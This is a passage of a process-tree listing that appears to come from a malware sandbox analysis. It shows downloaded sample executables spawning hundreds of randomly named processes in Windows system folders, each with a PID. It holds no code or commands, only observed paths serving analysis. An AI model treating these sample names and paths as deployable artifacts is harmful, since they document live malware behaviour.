      PID:3028
    - - C:\Windows\SysWOW64\Aobilkcl.exe
        
        C:\Windows\system32\Aobilkcl.exe
        5⤵
        
        PID:10992
      - C:\Windows\SysWOW64\Cjaifp32.exe
        
        C:\Windows\system32\Cjaifp32.exe
        6⤵
        
        PID:12176
- - C:\Users\Admin\Downloads\240919-hq9dbawfkqeacdc92f07f34dfddff6596a4faa0634_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hq9dbawfkqeacdc92f07f34dfddff6596a4faa0634_JaffaCakes118.exe
    3⤵
    PID:9520
- - C:\Users\Admin\Downloads\240919-h1vmxawglhae43e9c5d02a3142443880566f27235c5f1101d3fd3826ddafa07e20de1933e4.exe
    C:\Users\Admin\Downloads\240919-h1vmxawglhae43e9c5d02a3142443880566f27235c5f1101d3fd3826ddafa07e20de1933e4.exe
    3⤵
    PID:9540
- - C:\Users\Admin\Downloads\240919-hr84yawfnpb2e836c8e1b7029446fcfe45b046f5f9915ba2b62be87419fa3dd78c208632c4N.exe
    C:\Users\Admin\Downloads\240919-hr84yawfnpb2e836c8e1b7029446fcfe45b046f5f9915ba2b62be87419fa3dd78c208632c4N.exe
    3⤵
    PID:9552
- - C:\Users\Admin\Downloads\240919-h8ld7sxdnm08e1eeb3cced74f47bb0d512889bb4938389507ed34b912a06e5283d46d8af6dN.exe
    C:\Users\Admin\Downloads\240919-h8ld7sxdnm08e1eeb3cced74f47bb0d512889bb4938389507ed34b912a06e5283d46d8af6dN.exe
    3⤵
    PID:9564
  - - C:\Windows\System\welqZlI.exe
      C:\Windows\System\welqZlI.exe
      4⤵
      PID:11816
  - - C:\Windows\System\PTnwIZc.exe
      C:\Windows\System\PTnwIZc.exe
      4⤵
      PID:11832
  - - C:\Windows\System\kvKakKa.exe
      C:\Windows\System\kvKakKa.exe
      4⤵
      PID:11848
  - - C:\Windows\System\qcMqOmx.exe
      C:\Windows\System\qcMqOmx.exe
      4⤵
      PID:11868
  - - C:\Windows\System\shUrfPI.exe
      C:\Windows\System\shUrfPI.exe
      4⤵
      PID:11892
  - - C:\Windows\System\MHxSsOd.exe
      C:\Windows\System\MHxSsOd.exe
      4⤵
      PID:11928
  - - C:\Windows\System\ERRFaMU.exe
      C:\Windows\System\ERRFaMU.exe
      4⤵
      PID:11944
  - - C:\Windows\System\wUSyHQw.exe
      C:\Windows\System\wUSyHQw.exe
      4⤵
      PID:11960
  - - C:\Windows\System\gygtNOr.exe
      C:\Windows\System\gygtNOr.exe
      4⤵
      PID:11976
  - - C:\Windows\System\KJnzXsJ.exe
      C:\Windows\System\KJnzXsJ.exe
      4⤵
      PID:12020
  - - C:\Windows\System\OMKCqRO.exe
      C:\Windows\System\OMKCqRO.exe
      4⤵
      PID:12052
  - - C:\Windows\System\asvLNwN.exe
      C:\Windows\System\asvLNwN.exe
      4⤵
      PID:12068
  - - C:\Windows\System\mNOskPh.exe
      C:\Windows\System\mNOskPh.exe
      4⤵
      PID:12084
  - - C:\Windows\System\nbuofrJ.exe
      C:\Windows\System\nbuofrJ.exe
      4⤵
      PID:12100
  - - C:\Windows\System\EETwDKg.exe
      C:\Windows\System\EETwDKg.exe
      4⤵
      PID:12116
  - - C:\Windows\System\iGocapP.exe
      C:\Windows\System\iGocapP.exe
      4⤵
      PID:12160
  - - C:\Windows\System\sMcLzUs.exe
      C:\Windows\System\sMcLzUs.exe
      4⤵
      PID:12188
  - - C:\Windows\System\RQETyYG.exe
      C:\Windows\System\RQETyYG.exe
      4⤵
      PID:12208
  - - C:\Windows\System\NArQutE.exe
      C:\Windows\System\NArQutE.exe
      4⤵
      PID:12224
  - - C:\Windows\System\ACYzfCz.exe
      C:\Windows\System\ACYzfCz.exe
      4⤵
      PID:12240
  - - C:\Windows\System\YlmtYXI.exe
      C:\Windows\System\YlmtYXI.exe
      4⤵
      PID:12256
  - - C:\Windows\System\chNucDx.exe
      C:\Windows\System\chNucDx.exe
      4⤵
      PID:12272
  - - C:\Windows\System\mROdwWb.exe
      C:\Windows\System\mROdwWb.exe
      4⤵
      PID:9436
  - - C:\Windows\System\GonwmVn.exe
      C:\Windows\System\GonwmVn.exe
      4⤵
      PID:9488
  - - C:\Windows\System\OjMqdzo.exe
      C:\Windows\System\OjMqdzo.exe
      4⤵
      PID:9548
  - - C:\Windows\System\XNVQUXQ.exe
      C:\Windows\System\XNVQUXQ.exe
      4⤵
      PID:9628
  - - C:\Windows\System\aAmjjBn.exe
      C:\Windows\System\aAmjjBn.exe
      4⤵
      PID:9676
  - - C:\Windows\System\kvbzKrK.exe
      C:\Windows\System\kvbzKrK.exe
      4⤵
      PID:9724
  - - C:\Windows\System\ThhKdOm.exe
      C:\Windows\System\ThhKdOm.exe
      4⤵
      PID:5156
  - - C:\Windows\System\nJCULfe.exe
      C:\Windows\System\nJCULfe.exe
      4⤵
      PID:9832
  - - C:\Windows\System\DbmieCG.exe
      C:\Windows\System\DbmieCG.exe
      4⤵
      PID:9936
  - - C:\Windows\System\YyZZXIk.exe
      C:\Windows\System\YyZZXIk.exe
      4⤵
      PID:10052
  - - C:\Windows\System\rlRqaOR.exe
      C:\Windows\System\rlRqaOR.exe
      4⤵
      PID:1960
  - - C:\Windows\System\tGWDcrs.exe
      C:\Windows\System\tGWDcrs.exe
      4⤵
      PID:10136
  - - C:\Windows\System\aPDtZRz.exe
      C:\Windows\System\aPDtZRz.exe
      4⤵
      PID:9308
  - - C:\Windows\System\npcQVEM.exe
      C:\Windows\System\npcQVEM.exe
      4⤵
      PID:10164
  - - C:\Windows\System\RjSOmMz.exe
      C:\Windows\System\RjSOmMz.exe
      4⤵
      PID:10184
  - - C:\Windows\System\SJVXRCA.exe
      C:\Windows\System\SJVXRCA.exe
      4⤵
      PID:10228
  - - C:\Windows\System\unwPyWr.exe
      C:\Windows\System\unwPyWr.exe
      4⤵
      PID:7208
  - - C:\Windows\System\xHNGmAq.exe
      C:\Windows\System\xHNGmAq.exe
      4⤵
      PID:5104
  - - C:\Windows\System\LBSxyHb.exe
      C:\Windows\System\LBSxyHb.exe
      4⤵
      PID:1156
  - - C:\Windows\System\RQmXNsg.exe
      C:\Windows\System\RQmXNsg.exe
      4⤵
      PID:4972
  - - C:\Windows\System\QtxzVmH.exe
      C:\Windows\System\QtxzVmH.exe
      4⤵
      PID:7768
  - - C:\Windows\System\yGjENHd.exe
      C:\Windows\System\yGjENHd.exe
      4⤵
      PID:6480
  - - C:\Windows\System\PiaBddt.exe
      C:\Windows\System\PiaBddt.exe
      4⤵
      PID:8420
  - - C:\Windows\System\DxntFLp.exe
      C:\Windows\System\DxntFLp.exe
      4⤵
      PID:8476
  - - C:\Windows\System\XgXFxeR.exe
      C:\Windows\System\XgXFxeR.exe
      4⤵
      PID:8536
  - - C:\Windows\System\RbupvAr.exe
      C:\Windows\System\RbupvAr.exe
      4⤵
      PID:12296
  - - C:\Windows\System\AYcShhU.exe
      C:\Windows\System\AYcShhU.exe
      4⤵
      PID:12312
  - - C:\Windows\System\JfmWbab.exe
      C:\Windows\System\JfmWbab.exe
      4⤵
      PID:12332
  - - C:\Windows\System\FtnrCwT.exe
      C:\Windows\System\FtnrCwT.exe
      4⤵
      PID:12348
  - - C:\Windows\System\WClthxS.exe
      C:\Windows\System\WClthxS.exe
      4⤵
      PID:12364
  - - C:\Windows\System\oTpkxIW.exe
      C:\Windows\System\oTpkxIW.exe
      4⤵
      PID:12380
  - - C:\Windows\System\LweaWXS.exe
      C:\Windows\System\LweaWXS.exe
      4⤵
      PID:12428
  - - C:\Windows\System\bYsakBP.exe
      C:\Windows\System\bYsakBP.exe
      4⤵
      PID:12460
  - - C:\Windows\System\hoJbKpR.exe
      C:\Windows\System\hoJbKpR.exe
      4⤵
      PID:12480
  - - C:\Windows\System\yWfTvDz.exe
      C:\Windows\System\yWfTvDz.exe
      4⤵
      PID:12496
  - - C:\Windows\System\bnwSHVR.exe
      C:\Windows\System\bnwSHVR.exe
      4⤵
      PID:12512
  - - C:\Windows\System\GfcmDlJ.exe
      C:\Windows\System\GfcmDlJ.exe
      4⤵
      PID:12572
  - - C:\Windows\System\itcBzMO.exe
      C:\Windows\System\itcBzMO.exe
      4⤵
      PID:12592
  - - C:\Windows\System\CaczrEr.exe
      C:\Windows\System\CaczrEr.exe
      4⤵
      PID:12608
  - - C:\Windows\System\rFnfBUf.exe
      C:\Windows\System\rFnfBUf.exe
      4⤵
      PID:12624
  - - C:\Windows\System\bhmRCbV.exe
      C:\Windows\System\bhmRCbV.exe
      4⤵
      PID:12640
  - - C:\Windows\System\xDXBPjW.exe
      C:\Windows\System\xDXBPjW.exe
      4⤵
      PID:12668
  - - C:\Windows\System\yfOkaxU.exe
      C:\Windows\System\yfOkaxU.exe
      4⤵
      PID:12688
  - - C:\Windows\System\bOvGMRL.exe
      C:\Windows\System\bOvGMRL.exe
      4⤵
      PID:12732
  - - C:\Windows\System\jRmvuNG.exe
      C:\Windows\System\jRmvuNG.exe
      4⤵
      PID:12756
  - - C:\Windows\System\XuWMMMm.exe
      C:\Windows\System\XuWMMMm.exe
      4⤵
      PID:12788
  - - C:\Windows\System\EBepXpc.exe
      C:\Windows\System\EBepXpc.exe
      4⤵
      PID:12848
  - - C:\Windows\System\sWIahUZ.exe
      C:\Windows\System\sWIahUZ.exe
      4⤵
      PID:12872
  - - C:\Windows\System\pbQCRNf.exe
      C:\Windows\System\pbQCRNf.exe
      4⤵
      PID:12892
  - - C:\Windows\System\MOlkamt.exe
      C:\Windows\System\MOlkamt.exe
      4⤵
      PID:12948
  - - C:\Windows\System\qxMQnvD.exe
      C:\Windows\System\qxMQnvD.exe
      4⤵
      PID:12972
  - - C:\Windows\System\PWQzwhL.exe
      C:\Windows\System\PWQzwhL.exe
      4⤵
      PID:12988
  - - C:\Windows\System\ozFcbnC.exe
      C:\Windows\System\ozFcbnC.exe
      4⤵
      PID:13016
  - - C:\Windows\System\gEcCGOY.exe
      C:\Windows\System\gEcCGOY.exe
      4⤵
      PID:13048
  - - C:\Windows\System\URtnJwl.exe
      C:\Windows\System\URtnJwl.exe
      4⤵
      PID:13092
  - - C:\Windows\System\vrvtMRR.exe
      C:\Windows\System\vrvtMRR.exe
      4⤵
      PID:13152
  - - C:\Windows\System\bKLQwWi.exe
      C:\Windows\System\bKLQwWi.exe
      4⤵
      PID:13172
  - - C:\Windows\System\bXEeOZS.exe
      C:\Windows\System\bXEeOZS.exe
      4⤵
      PID:13196
  - - C:\Windows\System\xZBIhSf.exe
      C:\Windows\System\xZBIhSf.exe
      4⤵
      PID:13212
  - - C:\Windows\System\mGciWuN.exe
      C:\Windows\System\mGciWuN.exe
      4⤵
      PID:13228
  - - C:\Windows\System\STcjLCe.exe
      C:\Windows\System\STcjLCe.exe
      4⤵
      PID:13276
  - - C:\Windows\System\irXaQUm.exe
      C:\Windows\System\irXaQUm.exe
      4⤵
      PID:8644
  - - C:\Windows\System\sjzoXGY.exe
      C:\Windows\System\sjzoXGY.exe
      4⤵
      PID:8324
  - - C:\Windows\System\chExJHV.exe
      C:\Windows\System\chExJHV.exe
      4⤵
      PID:9404
  - - C:\Windows\System\EQhyUGP.exe
      C:\Windows\System\EQhyUGP.exe
      4⤵
      PID:11304
  - - C:\Windows\System\DFOfGwj.exe
      C:\Windows\System\DFOfGwj.exe
      4⤵
      PID:13324
  - - C:\Windows\System\pbnIhTY.exe
      C:\Windows\System\pbnIhTY.exe
      4⤵
      PID:13344
  - - C:\Windows\System\RtzDKyT.exe
      C:\Windows\System\RtzDKyT.exe
      4⤵
      PID:13360
  - - C:\Windows\System\mqVjVtk.exe
      C:\Windows\System\mqVjVtk.exe
      4⤵
      PID:13388
  - - C:\Windows\System\TMpiUVt.exe
      C:\Windows\System\TMpiUVt.exe
      4⤵
      PID:13412
  - - C:\Windows\System\ZLcCvgm.exe
      C:\Windows\System\ZLcCvgm.exe
      4⤵
      PID:13444
  - - C:\Windows\System\gyMbZhq.exe
      C:\Windows\System\gyMbZhq.exe
      4⤵
      PID:13484
  - - C:\Windows\System\uJdpARD.exe
      C:\Windows\System\uJdpARD.exe
      4⤵
      PID:13508
  - - C:\Windows\System\IZfjzUG.exe
      C:\Windows\System\IZfjzUG.exe
      4⤵
      PID:13536
  - - C:\Windows\System\vAmHaBh.exe
      C:\Windows\System\vAmHaBh.exe
      4⤵
      PID:13552
  - - C:\Windows\System\oQgNkki.exe
      C:\Windows\System\oQgNkki.exe
      4⤵
      PID:13596
  - - C:\Windows\System\ghMZfEI.exe
      C:\Windows\System\ghMZfEI.exe
      4⤵
      PID:13644
  - - C:\Windows\System\JLiSCJK.exe
      C:\Windows\System\JLiSCJK.exe
      4⤵
      PID:13668
  - - C:\Windows\System\eMwvnlg.exe
      C:\Windows\System\eMwvnlg.exe
      4⤵
      PID:13684
  - - C:\Windows\System\kjdiMLi.exe
      C:\Windows\System\kjdiMLi.exe
      4⤵
      PID:13708
  - - C:\Windows\System\CZSemdW.exe
      C:\Windows\System\CZSemdW.exe
      4⤵
      PID:13724
  - - C:\Windows\System\QgRxlqx.exe
      C:\Windows\System\QgRxlqx.exe
      4⤵
      PID:13744
  - - C:\Windows\System\lMgdtVq.exe
      C:\Windows\System\lMgdtVq.exe
      4⤵
      PID:13764
  - - C:\Windows\System\SeaJEoW.exe
      C:\Windows\System\SeaJEoW.exe
      4⤵
      PID:13784
  - - C:\Windows\System\XNqfUjz.exe
      C:\Windows\System\XNqfUjz.exe
      4⤵
      PID:13804
  - - C:\Windows\System\gTHAqDc.exe
      C:\Windows\System\gTHAqDc.exe
      4⤵
      PID:13820
  - - C:\Windows\System\ztaQqrg.exe
      C:\Windows\System\ztaQqrg.exe
      4⤵
      PID:13836
  - - C:\Windows\System\TNieiWE.exe
      C:\Windows\System\TNieiWE.exe
      4⤵
      PID:13868
  - - C:\Windows\System\ERvkxys.exe
      C:\Windows\System\ERvkxys.exe
      4⤵
      PID:13884
  - - C:\Windows\System\eqhdJiy.exe
      C:\Windows\System\eqhdJiy.exe
      4⤵
      PID:13900
  - - C:\Windows\System\njNNWDk.exe
      C:\Windows\System\njNNWDk.exe
      4⤵
      PID:13932
  - - C:\Windows\System\MlbpXQM.exe
      C:\Windows\System\MlbpXQM.exe
      4⤵
      PID:13956
  - - C:\Windows\System\FkuuqDj.exe
      C:\Windows\System\FkuuqDj.exe
      4⤵
      PID:13996
  - - C:\Windows\System\SZkfoHu.exe
      C:\Windows\System\SZkfoHu.exe
      4⤵
      PID:14024
  - - C:\Windows\System\gXlMiFe.exe
      C:\Windows\System\gXlMiFe.exe
      4⤵
      PID:14088
  - - C:\Windows\System\pTpgiXk.exe
      C:\Windows\System\pTpgiXk.exe
      4⤵
      PID:14112
  - - C:\Windows\System\gIaMtfW.exe
      C:\Windows\System\gIaMtfW.exe
      4⤵
      PID:14168
  - - C:\Windows\System\wIurSgt.exe
      C:\Windows\System\wIurSgt.exe
      4⤵
      PID:14184
  - - C:\Windows\System\ZOpGoFb.exe
      C:\Windows\System\ZOpGoFb.exe
      4⤵
      PID:14204
  - - C:\Windows\System\KsdqEfY.exe
      C:\Windows\System\KsdqEfY.exe
      4⤵
      PID:14256
  - - C:\Windows\System\ecSMQkv.exe
      C:\Windows\System\ecSMQkv.exe
      4⤵
      PID:14272
  - - C:\Windows\System\NDQRFcZ.exe
      C:\Windows\System\NDQRFcZ.exe
      4⤵
      PID:14288
  - - C:\Windows\System\qAovNLa.exe
      C:\Windows\System\qAovNLa.exe
      4⤵
      PID:14304
  - - C:\Windows\System\zfeAovj.exe
      C:\Windows\System\zfeAovj.exe
      4⤵
      PID:2408
  - - C:\Windows\System\AKuzGtM.exe
      C:\Windows\System\AKuzGtM.exe
      4⤵
      PID:11576
  - - C:\Windows\System\qPAgtFB.exe
      C:\Windows\System\qPAgtFB.exe
      4⤵
      PID:10420
  - - C:\Windows\System\bUELugG.exe
      C:\Windows\System\bUELugG.exe
      4⤵
      PID:6664
  - - C:\Windows\System\EIegfzb.exe
      C:\Windows\System\EIegfzb.exe
      4⤵
      PID:6072
  - - C:\Windows\System\sPtvoMu.exe
      C:\Windows\System\sPtvoMu.exe
      4⤵
      PID:10716
  - - C:\Windows\System\LaYBDJS.exe
      C:\Windows\System\LaYBDJS.exe
      4⤵
      PID:10720
  - - C:\Windows\System\egLbqoa.exe
      C:\Windows\System\egLbqoa.exe
      4⤵
      PID:2300
  - - C:\Windows\System\PLlUzBE.exe
      C:\Windows\System\PLlUzBE.exe
      4⤵
      PID:8856
  - - C:\Windows\System\RiVWRWV.exe
      C:\Windows\System\RiVWRWV.exe
      4⤵
      PID:12064
  - - C:\Windows\System\WzWHdYK.exe
      C:\Windows\System\WzWHdYK.exe
      4⤵
      PID:10976
  - - C:\Windows\System\UwnxMfy.exe
      C:\Windows\System\UwnxMfy.exe
      4⤵
      PID:9064
  - - C:\Windows\System\qxQYpvp.exe
      C:\Windows\System\qxQYpvp.exe
      4⤵
      PID:9084
  - - C:\Windows\System\gdZWDmj.exe
      C:\Windows\System\gdZWDmj.exe
      4⤵
      PID:2128
  - - C:\Windows\System\ChinwgC.exe
      C:\Windows\System\ChinwgC.exe
      4⤵
      PID:4836
  - - C:\Windows\System\PPyummB.exe
      C:\Windows\System\PPyummB.exe
      4⤵
      PID:5012
  - - C:\Windows\System\OosHeeU.exe
      C:\Windows\System\OosHeeU.exe
      4⤵
      PID:7608
  - - C:\Windows\System\qBQvbxr.exe
      C:\Windows\System\qBQvbxr.exe
      4⤵
      PID:6996
  - - C:\Windows\System\GTZQGpW.exe
      C:\Windows\System\GTZQGpW.exe
      4⤵
      PID:1460
  - - C:\Windows\System\enpWgsZ.exe
      C:\Windows\System\enpWgsZ.exe
      4⤵
      PID:9180
  - - C:\Windows\System\snzdyBR.exe
      C:\Windows\System\snzdyBR.exe
      4⤵
      PID:7684
  - - C:\Windows\System\eZpbAlo.exe
      C:\Windows\System\eZpbAlo.exe
      4⤵
      PID:7352
  - - C:\Windows\System\QJKneWX.exe
      C:\Windows\System\QJKneWX.exe
      4⤵
      PID:7972
  - - C:\Windows\System\lUaWmBs.exe
      C:\Windows\System\lUaWmBs.exe
      4⤵
      PID:8044
  - - C:\Windows\System\rlbyIXA.exe
      C:\Windows\System\rlbyIXA.exe
      4⤵
      PID:6316
  - - C:\Windows\System\VlKFSaS.exe
      C:\Windows\System\VlKFSaS.exe
      4⤵
      PID:8248
  - - C:\Windows\System\xhImicJ.exe
      C:\Windows\System\xhImicJ.exe
      4⤵
      PID:7184
  - - C:\Windows\System\bLnJqTY.exe
      C:\Windows\System\bLnJqTY.exe
      4⤵
      PID:14372
  - - C:\Windows\System\pUsxBzr.exe
      C:\Windows\System\pUsxBzr.exe
      4⤵
      PID:14120
  - - C:\Windows\System\iomvvzh.exe
      C:\Windows\System\iomvvzh.exe
      4⤵
      PID:14160
  - - C:\Windows\System\KLfmHWA.exe
      C:\Windows\System\KLfmHWA.exe
      4⤵
      PID:14176
  - - C:\Windows\System\FVxChfn.exe
      C:\Windows\System\FVxChfn.exe
      4⤵
      PID:14220
  - - C:\Windows\System\sVWZZOi.exe
      C:\Windows\System\sVWZZOi.exe
      4⤵
      PID:4888
  - - C:\Windows\System\RlxaQPP.exe
      C:\Windows\System\RlxaQPP.exe
      4⤵
      PID:14284
  - - C:\Windows\System\uGbNytR.exe
      C:\Windows\System\uGbNytR.exe
      4⤵
      PID:7716
  - - C:\Windows\System\xAExkEx.exe
      C:\Windows\System\xAExkEx.exe
      4⤵
      PID:10508
  - - C:\Windows\System\ceMnnXo.exe
      C:\Windows\System\ceMnnXo.exe
      4⤵
      PID:3020
  - - C:\Windows\System\EakZsQj.exe
      C:\Windows\System\EakZsQj.exe
      4⤵
      PID:7920
  - - C:\Windows\System\rdYVghP.exe
      C:\Windows\System\rdYVghP.exe
      4⤵
      PID:10156
  - - C:\Windows\System\ddgzQay.exe
      C:\Windows\System\ddgzQay.exe
      4⤵
      PID:6020
  - - C:\Windows\System\SSSsRwm.exe
      C:\Windows\System\SSSsRwm.exe
      4⤵
      PID:3680
  - - C:\Windows\System\KppSjnb.exe
      C:\Windows\System\KppSjnb.exe
      4⤵
      PID:2132
  - - C:\Windows\System\BBgXDxc.exe
      C:\Windows\System\BBgXDxc.exe
      4⤵
      PID:14408
  - - C:\Windows\System\nESHGHB.exe
      C:\Windows\System\nESHGHB.exe
      4⤵
      PID:15352
  - - C:\Windows\System\WjlHqVB.exe
      C:\Windows\System\WjlHqVB.exe
      4⤵
      PID:14940
  - - C:\Windows\System\vdKjmxw.exe
      C:\Windows\System\vdKjmxw.exe
      4⤵
      PID:6956
  - - C:\Windows\System\aRPqllx.exe
      C:\Windows\System\aRPqllx.exe
      4⤵
      PID:13692
  - - C:\Windows\System\FsVYehH.exe
      C:\Windows\System\FsVYehH.exe
      4⤵
      PID:14684
  - - C:\Windows\System\eLSuNZy.exe
      C:\Windows\System\eLSuNZy.exe
      4⤵
      PID:14728
  - - C:\Windows\System\BzQSnRm.exe
      C:\Windows\System\BzQSnRm.exe
      4⤵
      PID:14780
  - - C:\Windows\System\qfqhnKa.exe
      C:\Windows\System\qfqhnKa.exe
      4⤵
      PID:6940
  - - C:\Windows\System\WMOWQkP.exe
      C:\Windows\System\WMOWQkP.exe
      4⤵
      PID:14964
  - - C:\Windows\System\pxkUbIi.exe
      C:\Windows\System\pxkUbIi.exe
      4⤵
      PID:4764
  - - C:\Windows\System\kyANnub.exe
      C:\Windows\System\kyANnub.exe
      4⤵
      PID:15052
  - - C:\Windows\System\qyIjBgB.exe
      C:\Windows\System\qyIjBgB.exe
      4⤵
      PID:15060
  - - C:\Windows\System\WtnxDSr.exe
      C:\Windows\System\WtnxDSr.exe
      4⤵
      PID:15076
  - - C:\Windows\System\rKRkzOM.exe
      C:\Windows\System\rKRkzOM.exe
      4⤵
      PID:15316
  - - C:\Windows\System\tCxoPZU.exe
      C:\Windows\System\tCxoPZU.exe
      4⤵
      PID:10320
  - - C:\Windows\System\KUoeelc.exe
      C:\Windows\System\KUoeelc.exe
      4⤵
      PID:1436
  - - C:\Windows\System\AfHIHuG.exe
      C:\Windows\System\AfHIHuG.exe
      4⤵
      PID:10688
  - - C:\Windows\System\ndUvAiY.exe
      C:\Windows\System\ndUvAiY.exe
      4⤵
      PID:13660
  - - C:\Windows\System\ornvYsF.exe
      C:\Windows\System\ornvYsF.exe
      4⤵
      PID:7040
  - - C:\Windows\System\kOtXyqv.exe
      C:\Windows\System\kOtXyqv.exe
      4⤵
      PID:10388
  - - C:\Windows\System\xaDwnCF.exe
      C:\Windows\System\xaDwnCF.exe
      4⤵
      PID:17000
  - - C:\Windows\System\TmqLApy.exe
      C:\Windows\System\TmqLApy.exe
      4⤵
      PID:19276
  - - C:\Windows\System\NYqPgTl.exe
      C:\Windows\System\NYqPgTl.exe
      4⤵
      PID:19292
  - - C:\Windows\System\pCkhaMY.exe
      C:\Windows\System\pCkhaMY.exe
      4⤵
      PID:19324
  - - C:\Windows\System\DripLab.exe
      C:\Windows\System\DripLab.exe
      4⤵
      PID:19356
  - - C:\Windows\System\gdAWuuv.exe
      C:\Windows\System\gdAWuuv.exe
      4⤵
      PID:19388
  - - C:\Windows\System\TLunRlD.exe
      C:\Windows\System\TLunRlD.exe
      4⤵
      PID:19404
  - - C:\Windows\System\afDbRoc.exe
      C:\Windows\System\afDbRoc.exe
      4⤵
      PID:19436
  - - C:\Windows\System\RPamBwU.exe
      C:\Windows\System\RPamBwU.exe
      4⤵
      PID:8924
  - - C:\Windows\System\bAexDsG.exe
      C:\Windows\System\bAexDsG.exe
      4⤵
      PID:14412
  - - C:\Windows\System\dbabnZW.exe
      C:\Windows\System\dbabnZW.exe
      4⤵
      PID:5384
  - - C:\Windows\System\GnbtgYg.exe
      C:\Windows\System\GnbtgYg.exe
      4⤵
      PID:15956
  - - C:\Windows\System\VdkUmCv.exe
      C:\Windows\System\VdkUmCv.exe
      4⤵
      PID:16012
  - - C:\Windows\System\yLeoRvw.exe
      C:\Windows\System\yLeoRvw.exe
      4⤵
      PID:16048
  - - C:\Windows\System\teRwzro.exe
      C:\Windows\System\teRwzro.exe
      4⤵
      PID:16116
  - - C:\Windows\System\gnBSsIy.exe
      C:\Windows\System\gnBSsIy.exe
      4⤵
      PID:11988
  - - C:\Windows\System\kJfhXBP.exe
      C:\Windows\System\kJfhXBP.exe
      4⤵
      PID:15112
  - - C:\Windows\System\lbfMqmd.exe
      C:\Windows\System\lbfMqmd.exe
      4⤵
      PID:14740
  - - C:\Windows\System\pFZUIwu.exe
      C:\Windows\System\pFZUIwu.exe
      4⤵
      PID:16368
  - - C:\Windows\System\ueOKJPW.exe
      C:\Windows\System\ueOKJPW.exe
      4⤵
      PID:16388
  - - C:\Windows\System\PuPiCUm.exe
      C:\Windows\System\PuPiCUm.exe
      4⤵
      PID:16608
  - - C:\Windows\System\IjhxCdB.exe
      C:\Windows\System\IjhxCdB.exe
      4⤵
      PID:15148
  - - C:\Windows\System\fGwGQVb.exe
      C:\Windows\System\fGwGQVb.exe
      4⤵
      PID:17060
  - - C:\Windows\System\RECeRSb.exe
      C:\Windows\System\RECeRSb.exe
      4⤵
      PID:17204
  - - C:\Windows\System\jhotxVS.exe
      C:\Windows\System\jhotxVS.exe
      4⤵
      PID:19464
  - - C:\Windows\System\bnfpQpt.exe
      C:\Windows\System\bnfpQpt.exe
      4⤵
      PID:19496
  - - C:\Windows\System\CjHqZyP.exe
      C:\Windows\System\CjHqZyP.exe
      4⤵
      PID:19516
  - - C:\Windows\System\dYASZND.exe
      C:\Windows\System\dYASZND.exe
      4⤵
      PID:19544
  - - C:\Windows\System\uRoTdOW.exe
      C:\Windows\System\uRoTdOW.exe
      4⤵
      PID:19580
  - - C:\Windows\System\zyXAGoj.exe
      C:\Windows\System\zyXAGoj.exe
      4⤵
      PID:19612
  - - C:\Windows\System\RtGLJyM.exe
      C:\Windows\System\RtGLJyM.exe
      4⤵
      PID:19632
  - - C:\Windows\System\hGqdomJ.exe
      C:\Windows\System\hGqdomJ.exe
      4⤵
      PID:19660
  - - C:\Windows\System\mCFHaQw.exe
      C:\Windows\System\mCFHaQw.exe
      4⤵
      PID:19692
  - - C:\Windows\System\kBwWqWo.exe
      C:\Windows\System\kBwWqWo.exe
      4⤵
      PID:19724
  - - C:\Windows\System\sGBtNdy.exe
      C:\Windows\System\sGBtNdy.exe
      4⤵
      PID:19744
  - - C:\Windows\System\mnnrVrs.exe
      C:\Windows\System\mnnrVrs.exe
      4⤵
      PID:19772
  - - C:\Windows\System\UtCuEhX.exe
      C:\Windows\System\UtCuEhX.exe
      4⤵
      PID:19788
  - - C:\Windows\System\fXfxxOq.exe
      C:\Windows\System\fXfxxOq.exe
      4⤵
      PID:19824
  - - C:\Windows\System\tuLSthW.exe
      C:\Windows\System\tuLSthW.exe
      4⤵
      PID:19844
  - - C:\Windows\System\kEcfsJz.exe
      C:\Windows\System\kEcfsJz.exe
      4⤵
      PID:19860
  - - C:\Windows\System\VJaQZZs.exe
      C:\Windows\System\VJaQZZs.exe
      4⤵
      PID:19876
  - - C:\Windows\System\DCrAULR.exe
      C:\Windows\System\DCrAULR.exe
      4⤵
      PID:19896
  - - C:\Windows\System\yqIVBgr.exe
      C:\Windows\System\yqIVBgr.exe
      4⤵
      PID:19928
  - - C:\Windows\System\UBWpWmt.exe
      C:\Windows\System\UBWpWmt.exe
      4⤵
      PID:19960
  - - C:\Windows\System\MqxXFrJ.exe
      C:\Windows\System\MqxXFrJ.exe
      4⤵
      PID:20000
  - - C:\Windows\System\nrbekjQ.exe
      C:\Windows\System\nrbekjQ.exe
      4⤵
      PID:20020
  - - C:\Windows\System\VrlwMYK.exe
      C:\Windows\System\VrlwMYK.exe
      4⤵
      PID:20044
  - - C:\Windows\System\grsjtTp.exe
      C:\Windows\System\grsjtTp.exe
      4⤵
      PID:20064
  - - C:\Windows\System\dBHzPNq.exe
      C:\Windows\System\dBHzPNq.exe
      4⤵
      PID:20084
  - - C:\Windows\System\RmzYWiT.exe
      C:\Windows\System\RmzYWiT.exe
      4⤵
      PID:20100
  - - C:\Windows\System\WGClmbC.exe
      C:\Windows\System\WGClmbC.exe
      4⤵
      PID:20116
  - - C:\Windows\System\vACVAmq.exe
      C:\Windows\System\vACVAmq.exe
      4⤵
      PID:20136
  - - C:\Windows\System\YxImgkx.exe
      C:\Windows\System\YxImgkx.exe
      4⤵
      PID:20176
  - - C:\Windows\System\sxSXbtp.exe
      C:\Windows\System\sxSXbtp.exe
      4⤵
      PID:20224
  - - C:\Windows\System\EyEZnWh.exe
      C:\Windows\System\EyEZnWh.exe
      4⤵
      PID:20240
  - - C:\Windows\System\xfMJzwe.exe
      C:\Windows\System\xfMJzwe.exe
      4⤵
      PID:20256
  - - C:\Windows\System\ZTFesho.exe
      C:\Windows\System\ZTFesho.exe
      4⤵
      PID:20272
  - - C:\Windows\System\UuWWTsn.exe
      C:\Windows\System\UuWWTsn.exe
      4⤵
      PID:20288
  - - C:\Windows\System\aYkKjBB.exe
      C:\Windows\System\aYkKjBB.exe
      4⤵
      PID:20304
  - - C:\Windows\System\lryZRmx.exe
      C:\Windows\System\lryZRmx.exe
      4⤵
      PID:20320
  - - C:\Windows\System\mmOHjfX.exe
      C:\Windows\System\mmOHjfX.exe
      4⤵
      PID:20336
  - - C:\Windows\System\qMvfgml.exe
      C:\Windows\System\qMvfgml.exe
      4⤵
      PID:20352
  - - C:\Windows\System\rdiloRP.exe
      C:\Windows\System\rdiloRP.exe
      4⤵
      PID:20392
  - - C:\Windows\System\WeGeswP.exe
      C:\Windows\System\WeGeswP.exe
      4⤵
      PID:20432
  - - C:\Windows\System\JGwMkTx.exe
      C:\Windows\System\JGwMkTx.exe
      4⤵
      PID:20472
